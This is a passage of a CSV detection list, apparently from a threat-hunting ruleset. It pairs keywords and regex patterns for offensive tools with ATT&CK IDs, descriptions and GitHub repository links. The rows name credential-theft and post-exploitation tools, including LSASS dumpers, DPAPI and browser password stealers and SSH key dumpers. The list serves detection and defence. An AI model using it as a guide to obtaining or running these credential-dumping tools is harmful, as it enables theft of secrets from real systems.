is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*dump_secrets.py*",".{0,1000}dump_secrets\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*dump_ssh_keys*",".{0,1000}dump_ssh_keys.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_tomcat*",".{0,1000}dump_tomcat.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_VAULT_INTERNET_EXPLORER*",".{0,1000}dump_VAULT_INTERNET_EXPLORER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_VAULT_NGC_LOCAL_ACCOOUNT*",".{0,1000}dump_VAULT_NGC_LOCAL_ACCOOUNT.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_VAULT_WIN_BIO_KEY*",".{0,1000}dump_VAULT_WIN_BIO_KEY.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_webconf*",".{0,1000}dump_webconf.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_webpass*",".{0,1000}dump_webpass.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_wifi_wpa_*",".{0,1000}dump_wifi_wpa_.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*",".{0,1000}dump_WPA\-PBKDF2\-PMKID_EAPOL\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dump_WPA-PMKID-PBKDF2.hashcat*",".{0,1000}dump_WPA\-PMKID\-PBKDF2\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*DumpAADSyncCreds.csproj*",".{0,1000}DumpAADSyncCreds\.csproj.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*DumpAADSyncCreds.exe*",".{0,1000}DumpAADSyncCreds\.exe.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*DumpAADSyncCreds.sln*",".{0,1000}DumpAADSyncCreds\.sln.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*DumpBrowserHistory*",".{0,1000}DumpBrowserHistory.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*DumpChromePasswords.ps1*",".{0,1000}DumpChromePasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DumpCreds*",".{0,1000}DumpCreds.{0,1000}","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","1","5","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z" "*-DumpCreds*",".{0,1000}\-DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*dumpcreds*mimipenguin*",".{0,1000}dumpcreds.{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*dumpCredStore.ps1*",".{0,1000}dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Dumped LSASS memory to *",".{0,1000}Dumped\sLSASS\smemory\sto\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*Dumpert*",".{0,1000}Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.bin*",".{0,1000}Dumpert\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*dumpert.dmp*",".{0,1000}dumpert\.dmp.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.git*",".{0,1000}Dumpert\.git.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*dumpert.py*",".{0,1000}dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*dumpert_path=*",".{0,1000}dumpert_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*dumpertdll*",".{0,1000}dumpertdll.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*Dumpert-DLL*",".{0,1000}Dumpert\-DLL.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*-DumpForest *",".{0,1000}\-DumpForest\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*dumping passwords from %s (pid:*",".{0,1000}dumping\spasswords\sfrom\s\%s\s\(pid\:.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*DumpKernel-S1.ps1*",".{0,1000}DumpKernel\-S1\.ps1.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","1","N/A","10","8","N/A","N/A","N/A","N/A" "*dumplsass*",".{0,1000}dumplsass.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*dumpntlm.py*",".{0,1000}dumpntlm\.py.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*DumpNTLMInfo.py*",".{0,1000}DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*DumpPEFromMemory.cpp*",".{0,1000}DumpPEFromMemory\.cpp.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*DumpPEFromMemory.exe*",".{0,1000}DumpPEFromMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*DumpPEFromMemoryMemory.exe*",".{0,1000}DumpPEFromMemoryMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*DumpProcessByName*",".{0,1000}DumpProcessByName.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*DumpSAM.ps1*",".{0,1000}DumpSAM\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*DumpShellcode.*",".{0,1000}DumpShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*DumpShellcode.exe*",".{0,1000}DumpShellcode\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" 